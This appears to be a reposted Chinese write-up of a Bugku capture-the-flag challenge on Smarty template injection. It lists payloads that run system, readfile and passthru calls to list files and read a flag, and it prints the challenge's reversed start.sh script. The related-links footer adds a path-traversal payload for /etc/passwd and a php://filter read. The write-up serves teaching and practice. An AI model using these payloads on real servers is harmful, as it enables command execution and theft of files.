首页 > 编程语言 >Bugku-聪明的php

Bugku-聪明的php

时间:2023-08-30 09:00:11浏览次数:36  
标签:Bugku .. FLAG RANDOM flag 聪明 php payload

images

smarty模板注入常用的payload

常用payload

常用payload
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if readfile('/flag')}{/if} 
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if} 
smarty中的{if}标签中可以执行php语句

images
随便传参可以发现有东西出来

images
可以发现这个被计算了,说明可以利用,但是有很多参数都被过滤了

images
可以使用的是参数有passthru,参数利用发现内容

images
查看start.sh可以看到代码内容

images
倒叙排列的而已

done
sleep 1000
do
while test "1" = "1"
export T=$RANDOM
FLAG=not_flag
export FLAG=not_flag
chmod 444 /_$T
echo $FLAG > /_$T
T=$RANDOM
export T=$RANDOM
service apache2 start
#!/usr/bin/env bash

images

标签:Bugku,..,FLAG,RANDOM,flag,聪明,php,payload
From: https://www.cnblogs.com/KAKSKY/p/17665240.html

相关文章

  • 深信服应用交付报表系统download.php任意文件读取漏洞
    漏洞描述深信服应用交付报表系统download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。漏洞影响深信服应用交付报表系统漏洞复现fofa搜索环境复现:app="SANGFOR-应用交付报表系统"登录页面:payload:/report/download.php?pdf=../../../../../etc/pa......
  • ThinkPHP框架简介
    ThinkPHP是单一入口框架。即:在一个网站中,所有的请求都指向同一个脚本文件。使用PHP创建项目:新建一个项目,在index.php文件中:<?phpdefine('APP_NAME','app');define('APP_PATH','./APP/');require('./ThinkPHP/ThinkPHP.php'); 配置文件:config.php若自定义一个配置文件,需要在co......
  • thinkphp5 日期+group by + 分页paginate查询
    <?php//根据日期来统计所消耗的点数//模型的使用方法$result=$model->field("id,FROM_UNIXTIME(createtime,'%Y-%m-%d')as`createtime`,sum(price)ascount_price")->group("FROM_UNIXTIME(createtime,'%Y-%m-%d'),store......
  • Bugku-misc-telnet
    刚结束的ciscn,里面的要是有这么简单就好了。下载附件,是个pcap文件,打开wireshark分析一节一节看过去就找到了flag没难度的~~~......
  • Bugku-Web13
    根据题意进行unescape解码,得到js脚本,将js脚本中的代码填入输入框中点击提交就得到了flag......
  • Bugku-Web12
    没啥思路,感觉自己在刷题,,,这个考虑的是本地管理员查看源码可以知道密码是base64加密的,使用工具解码就可以了!账号是admin,从评论里知道的...打开burp抓包,修改X-Forwarded-For:127.0.0.1即可......
  • Bugku-Web11
    没啥思路,在这个网站上不能右键弹出属性框,F12查看也没啥可看的,所以就去看了看评论,大概的套路有了,就只有实践了先安装dirsearch:https://github.com/maurosoria/dirsearch进入GitHub下载zip包,我拖到了kali里面安装,因为在wndows中解压输入命令就弹出dirsearch.py的文本文件,做完......
  • Bugku-Web10
    这个很简单!!!看了查看器,里面啥也没有,就看看网络,点开发现了flag......
  • Bugku-Web7
    打开页面之后一直在刷新(也可以说是窗口重新加载?)最近刚学了js脚本,浏览器右键检查源代码,发现有一个script一直在重载,在firefox浏览器中禁用js后,去网络里看加载页面源代码,然后就找到了flagfirefox禁用js的方式:先在地址栏输入about:config然后在搜索框中输入Javascript看到javas......
  • Bugku-Web14
    php://filter/read=convert.base64-encode/resource=index.php......